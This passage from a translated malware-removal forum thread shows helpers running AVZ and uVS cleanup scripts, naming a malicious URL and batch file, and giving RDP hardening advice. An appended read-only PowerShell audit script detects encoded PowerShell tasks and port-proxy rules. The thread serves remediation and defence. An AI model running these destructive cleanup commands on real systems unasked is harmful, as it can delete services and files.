     DeleteService('OVFd');
     DeleteService('oVjD');
     DeleteService('ovQM');
     DeleteService('oWnN');
     DeleteService('OXNY');
     DeleteService('OxoE');
     DeleteService('oZAh');
     DeleteService('OZbK');
     DeleteService('OzOi');
     DeleteService('OzUG');
     DeleteService('PbfR');
     DeleteService('PcAX');
     DeleteService('PccC');
     DeleteService('peHY');
     DeleteService('PFvs');
     DeleteService('pGhj');
     DeleteService('PGIt');
     DeleteService('PgMn');
     DeleteService('PIrR');
     DeleteService('pitq');
     DeleteService('pItx');
     DeleteService('pkwS');
     DeleteService('PMEC');
     DeleteService('pmQJ');
     DeleteService('pOlN');
     DeleteService('POpy');
     DeleteService('poXB');
     DeleteService('PoZJ');
     DeleteService('PPpT');
     DeleteService('PqJc');
     DeleteService('pQVR');
     DeleteService('PRfy');
     DeleteService('PrPv');
     DeleteService('Prvw');
     DeleteService('PsTK');
     DeleteService('PtRI');
     DeleteService('PuEG');
     DeleteService('puIW');
     DeleteService('PUNt');
     DeleteService('PuoC');
     DeleteService('pUtY');
     DeleteService('PXDw');
     DeleteService('pxMg');
     DeleteService('PXqm');
     DeleteService('pXxd');
     DeleteService('PXYC');
     DeleteService('pYXX');
     DeleteService('PztL');
     DeleteService('QBdh');
     DeleteService('qbDu');
     DeleteService('QbNP');
     DeleteService('qewt');
     DeleteService('qgBR');
     DeleteService('Qhnc');
     DeleteService('QJnR');
     DeleteService('QjYy');
     DeleteService('qkXT');
     DeleteService('qMfS');
     DeleteService('qNTu');
     DeleteService('Qotq');
     DeleteService('qpTo');
     DeleteService('qRiZ');
     DeleteService('QtkM');
     DeleteService('QuNS');
     DeleteService('QuUV');
     DeleteService('QuVC');
     DeleteService('Qvgl');
     DeleteService('QvLR');
     DeleteService('QWFk');
     DeleteService('QwPN');
     DeleteService('Qxtv');
     DeleteService('RAAG');
     DeleteService('RaGL');
     DeleteService('rAOS');
     DeleteService('raTM');
     DeleteService('RbHP');
     DeleteService('RcDa');
     DeleteService('RCHO');
     DeleteService('rDTA');
     DeleteService('REPJ');
     DeleteService('rhdk');
     DeleteService('Rjbg');
     DeleteService('rlAo');
     DeleteService('rLqN');
     DeleteService('roDW');
     DeleteService('ROmf');
     DeleteService('rOWm');
     DeleteService('Rqgj');
     DeleteService('RQqP');
     DeleteService('rQYY');
     DeleteService('rrvD');
     DeleteService('rtCg');
     DeleteService('RTMu');
     DeleteService('rUdN');
     DeleteService('rveN');
     DeleteService('rVfG');
     DeleteService('rvlX');
     DeleteService('rVsf');
     DeleteService('RWeb');
     DeleteService('RwGR');
     DeleteService('RxCt');
     DeleteService('RxOL');
     DeleteService('Rxuj');
     DeleteService('RZgQ');
     DeleteService('rzit');
     DeleteService('RZLi');
     DeleteService('SANL');
     DeleteService('SAtS');
     DeleteService('sAyi');
     DeleteService('SCcg');
     DeleteService('sdcn');
     DeleteService('sDOl');
     DeleteService('SEnc');
     DeleteService('SERm');
     DeleteService('SHiS');
     DeleteService('shsz');
     DeleteService('sJKj');
     DeleteService('sjoT');
     DeleteService('SmeQ');
     DeleteService('SmIB');
     DeleteService('SnBQ');
     DeleteService('snbZ');
     DeleteService('sNiO');
     DeleteService('SoFh');
     DeleteService('spaX');
     DeleteService('Spmp');
     DeleteService('SPOm');
     DeleteService('SRaD');
     DeleteService('SRZG');
     DeleteService('sRzz');
     DeleteService('suHV');
     DeleteService('sUKn');
     DeleteService('SvEO');
     DeleteService('SVhp');
     DeleteService('sVqh');
     DeleteService('SwWe');
     DeleteService('SXnK');
     DeleteService('SZAu');
     DeleteService('tArC');
     DeleteService('teAq');
     DeleteService('TeZi');
     DeleteService('tfia');
     DeleteService('TfkV');
     DeleteService('tfsh');
     DeleteService('thCj');
     DeleteService('thgP');
     DeleteService('tivm');
     DeleteService('TIyM');
     DeleteService('TkbM');
     DeleteService('tKnj');
     DeleteService('TMkz');
     DeleteService('Toif');
     DeleteService('TQMU');
     DeleteService('ttXX');
     DeleteService('TurV');
     DeleteService('tvym');
     DeleteService('TWfY');
     DeleteService('TwqB');
     DeleteService('TWzz');
     DeleteService('TXcs');
     DeleteService('Tzov');
     DeleteService('uCMV');
     DeleteService('uEhY');
     DeleteService('UEjH');
     DeleteService('UGmp');
     DeleteService('UhZf');
     DeleteService('uiMw');
     DeleteService('UiOZ');
     DeleteService('UiRW');
     DeleteService('uIZB');
     DeleteService('UJdZ');
     DeleteService('ulhy');
     DeleteService('uLqf');
     DeleteService('UmhJ');
     DeleteService('umIz');
     DeleteService('uMrz');
     DeleteService('uNsj');
     DeleteService('uNXN');
     DeleteService('uoae');
     DeleteService('UoFS');
     DeleteService('uoLx');
     DeleteService('UOZp');
     DeleteService('UQSR');
     DeleteService('utUh');
     DeleteService('uxNA');
     DeleteService('uYpc');
     DeleteService('ValP');
     DeleteService('VAMF');
     DeleteService('vaVc');
     DeleteService('VBLM');
     DeleteService('Vdff');
     DeleteService('vDjA');
     DeleteService('vDQv');
     DeleteService('vEYK');
     DeleteService('VHTa');
     DeleteService('VihC');
     DeleteService('vjdm');
     DeleteService('vJfb');
     DeleteService('Vkms');
     DeleteService('vlbs');
     DeleteService('VMPf');
     DeleteService('vMRy');
     DeleteService('voom');
     DeleteService('VQgW');
     DeleteService('vrBj');
     DeleteService('VSRa');
     DeleteService('vsrh');
     DeleteService('VTwz');
     DeleteService('vUri');
     DeleteService('vvdG');
     DeleteService('vvdJ');
     DeleteService('vwxi');
     DeleteService('VYSq');
     DeleteService('WAGy');
     DeleteService('wAua');
     DeleteService('WbEi');
     DeleteService('WbOw');
     DeleteService('WCfP');
     DeleteService('wCIG');
     DeleteService('Wdhm');
     DeleteService('wDVc');
     DeleteService('WfxE');
     DeleteService('wFxP');
     DeleteService('wgBd');
     DeleteService('Wjwz');
     DeleteService('wkDx');
     DeleteService('WlCO');
     DeleteService('wmHm');
     DeleteService('wMrw');
     DeleteService('wonm');
     DeleteService('wpRK');
     DeleteService('WSEe');
     DeleteService('wtgX');
     DeleteService('WTzV');
     DeleteService('WuLQ');
     DeleteService('wUwV');
     DeleteService('WVel');
     DeleteService('WWvD');
     DeleteService('WxTn');
     DeleteService('wXUF');
     DeleteService('wXWl');
     DeleteService('wZtm');
     DeleteService('XaLt');
     DeleteService('XBcg');
     DeleteService('XDTO');
     DeleteService('xEtp');
     DeleteService('XeXx');
     DeleteService('xFnh');
     DeleteService('xgga');
     DeleteService('xhJw');
     DeleteService('xHUx');
     DeleteService('XJki');
     DeleteService('XkTx');
     DeleteService('Xliw');
     DeleteService('XmzQ');
     DeleteService('xnwl');
     DeleteService('XpiQ');
     DeleteService('XpLJ');
     DeleteService('xqsn');
     DeleteService('XraU');
     DeleteService('XtcV');
     DeleteService('xTOk');
     DeleteService('XVwL');
     DeleteService('xWaV');
     DeleteService('XWbd');
     DeleteService('xWEf');
     DeleteService('XYUK');
     DeleteService('xzcJ');
     DeleteService('YbBJ');
     DeleteService('ybyQ');
     DeleteService('YCGT');
     DeleteService('YcTA');
     DeleteService('yFMa');
     DeleteService('yfsF');
     DeleteService('YFuB');
     DeleteService('ygbC');
     DeleteService('YGHG');
     DeleteService('YgYt');
     DeleteService('yJth');
     DeleteService('yKBO');
     DeleteService('ykmR');
     DeleteService('YLyz');
     DeleteService('yOod');
     DeleteService('yOsz');
     DeleteService('YrfH');
     DeleteService('ytRT');
     DeleteService('YtSQ');
     DeleteService('YwAz');
     DeleteService('YWsT');
     DeleteService('zAqY');
     DeleteService('zbdb');
     DeleteService('zDVX');
     DeleteService('zehI');
     DeleteService('zgCj');
     DeleteService('zNHc');
     DeleteService('ZOxu');
     DeleteService('ZQDg');
     DeleteService('zrFb');
     DeleteService('ZShG');
     DeleteService('zSnC');
     DeleteService('ZuAs');
     DeleteService('ZUIe');
     DeleteService('ZWTd');
     DeleteService('zWTe');
     DeleteService('zYpO');
     DeleteService('ZZmI');
     DeleteService('ZZQG');
     DeleteFileMask('c:\program files\rdp wrapper', '*', true);
     DeleteDirectory('c:\program files\rdp wrapper');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
     ExecuteSysClean;
     ExecuteWizard('SCU', 3, 3, true);
     RebootWindows(true);
    end.
    The computer will reboot.

    A quarantine archive quarantine.zip will appear in the AVZ folder; send that file via the "Submit requested quarantine" link above the first post in the thread.

    Temporarily disable the built-in antivirus (Defender): it gives a false positive on components of the program used next.
    Download the Universal Virus Sniffer utility from here and make a full uVS autorun image.
    WBR,
    Vadim

  5. #4
    Junior Member, registered 06.10.2020, 6 posts, reputation weight 1
    quarantine.zip was created, but it is empty. What could be the problem?

  6. #5
    Senior Helper, registered 06.05.2008, location Tula, 31,789 posts, reputation weight 959
    The files did not make it into quarantine; continue following the rest of the recommendations.
    WBR,
    Vadim

  7. #6
    Junior Member, registered 06.10.2020, 6 posts, reputation weight 1
    Universal Virus Sniffer created a file of 845 KB; the forum does not accept that size.

  8. #7
    Helper, registered 11.11.2007, 3,306 posts, reputation weight 115
    Pack it into an archive.

  9. #8
    Junior Member, registered 06.10.2020, 6 posts, reputation weight 1
    But it already is a RAR archive.

  10. #9
    Senior Helper, registered 06.05.2008, location Tula, 31,789 posts, reputation weight 959
    Upload it to an accessible cloud storage or a file-sharing service without a captcha and post the link.
    By the way, if you downloaded uVS from my link, the image should be in a .7Z archive and compressed a bit better than RAR.
    WBR,
    Vadim

  11. #10

  12. #11
    Senior Helper, registered 06.05.2008, location Tula, 31,789 posts, reputation weight 959
    Temporarily disable the antivirus.

    Copy the script below to the clipboard (select it and press Ctrl-C):
    Code:
    ;uVS v4.11.1 [http://dsrt.dyndns.org:8888]
    ;Target OS: NTv10.0
    v400c
    OFFSGNSAVE
    deltmp
    ;---------command-block---------
    unload %Sys32%\CMD.EXE
    deltsk %Sys32%\CMD.EXE
    delref >>C:/WINDOWS/TEMP/GOOGLEX.BAT
    delref >>C:/WINDOWS/TEMP/GOOGLEX.BAT&CMD.EXE
    zoo %SystemRoot%\TEMP\GOOGLEX.BAT
    delall %SystemRoot%\TEMP\GOOGLEX.BAT
    delref HTTP://GOOGLE.PROTOPOWER.ICU/MS.HTML
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\GOOGLEUPDATEBROKER.EXE
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.29.5\PSMACHINE_64.DLL
    apply
    
    czoo
    Run start.exe from the uVS folder, choose "Run as current user", and in the program's main menu choose Scripts -> Run script from clipboard.

    Reboot the system.

    A ZIP archive whose name starts with ZOO_ followed by the date and time will appear in the uVS folder; send that file via the "Submit requested quarantine" link above the first post in the thread.

    The uVS folder will also contain the script execution log, a text file named by the date and time of execution; attach it to your post.

    Judging by the disabled system updates and the ancient Windows 10 build with its many vulnerabilities, reinfecting over the network is trivial.
    WBR,
    Vadim

  13. #12
    Junior Member, registered 06.10.2020, 6 posts, reputation weight 1
    If I'm not mistaken, this virus got into the network when I opened NAT on the modem for RDP.
    Attachments

  14. #13
    Senior Helper, registered 06.05.2008, location Tula, 31,789 posts, reputation weight 959
    If there is no access to this computer right now, most likely it is being reinfected over the network. Judging by the log, everything should be cleaned out.
    Change the passwords of all accounts, those with administrator rights first.
    Remove administrator rights from all users who do not genuinely need them; with properly configured folder and registry permissions, in 90% of cases nobody needs them.
    Do not use user names like SERVER, ADMIN, 123, DASHA and the like; they are in every brute-force dictionary.

    Remote work in the office. RDP, Port Knocking, Mikrotik: simple and secure

    Download Farbar Recovery Scan Tool and save it to the Desktop.

    Note: you need to choose the version compatible with your operating system. If you are not sure which version suits your system, download both and try to run them. Only one of them will run on your system.
    Run the program. When it starts, click Yes to accept the warning.

    Click the Scan button.
    When the scan finishes, the reports FRST.txt and Addition.txt will be created in the same folder the program was run from.
    Attach these files to your next post (preferably both in one archive).
    WBR,
    Vadim
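    A read-only audit for the indicators this thread deals with, added here as an example; it is not code from the thread, from uVS or AVZ, or from the helpers. It covers the uVS post (#11), which removes the scheduled task and GOOGLEX.BAT, and the final post (#13), which concerns administrator rights and account names: it lists scheduled tasks whose action starts PowerShell with an encoded command or bypassed execution policy (the schtasks pattern from the first post), netsh portproxy rules, services with four-letter names like those the AVZ script deletes, members of the local Administrators group, enabled accounts with the dictionary-style names named in the post, and the RDP settings, since the reporter opened NAT for RDP. Assumptions: Windows 10, PowerShell 5.1 with the Microsoft.PowerShell.LocalAccounts module, an elevated prompt. The function name Invoke-PostInfectionAudit is mine, the registry paths are the standard locations netsh and Terminal Services use, and the name list contains only the names the post gives. The script reports and removes nothing.

```powershell
# Added example, not part of the thread. Assumes Windows 10, PowerShell 5.1, elevated prompt.
# Read-only: collects findings for review; it deletes nothing.
function Invoke-PostInfectionAudit {
    $findings = [System.Collections.Generic.List[object]]::new()

    # 1. Scheduled tasks whose action runs PowerShell with an encoded command or a bypassed
    #    execution policy, the pattern of the "AutFree" task from the first post.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match '(?i)powershell.*(-e\s|-enc\w*\s|-ep\s+bypass)') {
                $findings.Add([pscustomobject]@{
                    Finding = 'EncodedPowerShellTask'
                    Object  = "$($task.TaskPath)$($task.TaskName)"
                    Detail  = $cmd
                })
            }
        }
    }

    # 2. Port-proxy rules. netsh stores them under this key as "listenaddr/port" = "connectaddr/port";
    #    the first post shows listeners on 65532 and 65531 forwarding to 1.1.1.1:53.
    #    A clean workstation normally has none.
    $ppKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (Test-Path $ppKey) {
        (Get-ItemProperty -Path $ppKey).PSObject.Properties |
            Where-Object { $_.Name -notlike 'PS*' } |
            ForEach-Object {
                $findings.Add([pscustomobject]@{ Finding = 'PortProxyRule'; Object = $_.Name; Detail = $_.Value })
            }
    }

    # 3. Services with four-letter names, like the ones the AVZ script above deletes. A few Windows
    #    services (e.g. Dhcp) legitimately match, so the binary path is included for review.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.Name -match '^[A-Za-z]{4}$' } |
        ForEach-Object {
            $findings.Add([pscustomobject]@{ Finding = 'FourLetterService'; Object = $_.Name; Detail = "$($_.State); $($_.PathName)" })
        }

    # 4. Who holds local administrator rights (SID S-1-5-32-544 is the same on every locale, unlike the
    #    group name), and which enabled accounts carry the dictionary-style names the helper warns about.
    Get-LocalGroupMember -SID 'S-1-5-32-544' -ErrorAction SilentlyContinue | ForEach-Object {
        $findings.Add([pscustomobject]@{ Finding = 'LocalAdministrator'; Object = $_.Name; Detail = $_.ObjectClass })
    }
    $dictionaryNames = 'SERVER', 'ADMIN', '123', 'DASHA'   # names given in the post; extend as needed
    Get-LocalUser | Where-Object { $_.Enabled -and ($dictionaryNames -contains $_.Name.ToUpperInvariant()) } | ForEach-Object {
        $findings.Add([pscustomobject]@{ Finding = 'DictionaryUserName'; Object = $_.Name; Detail = 'name appears in brute-force wordlists' })
    }

    # 5. RDP exposure, since the reporter opened NAT for RDP: is RDP enabled, is Network Level
    #    Authentication required, and on which port does it listen.
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $tcp = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $findings.Add([pscustomobject]@{
        Finding = 'RdpConfiguration'
        Object  = "port $($tcp.PortNumber)"
        Detail  = "enabled=$($ts.fDenyTSConnections -eq 0); NLA required=$($tcp.UserAuthentication -eq 1)"
    })

    return $findings
}

Invoke-PostInfectionAudit | Format-Table -AutoSize -Wrap
```

    Run it once after the uVS script and reboot, and again a day later: a reappearing task, portproxy rule or four-letter service confirms the helper's suspicion that the machine is being reinfected over the network rather than that the cleanup failed.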
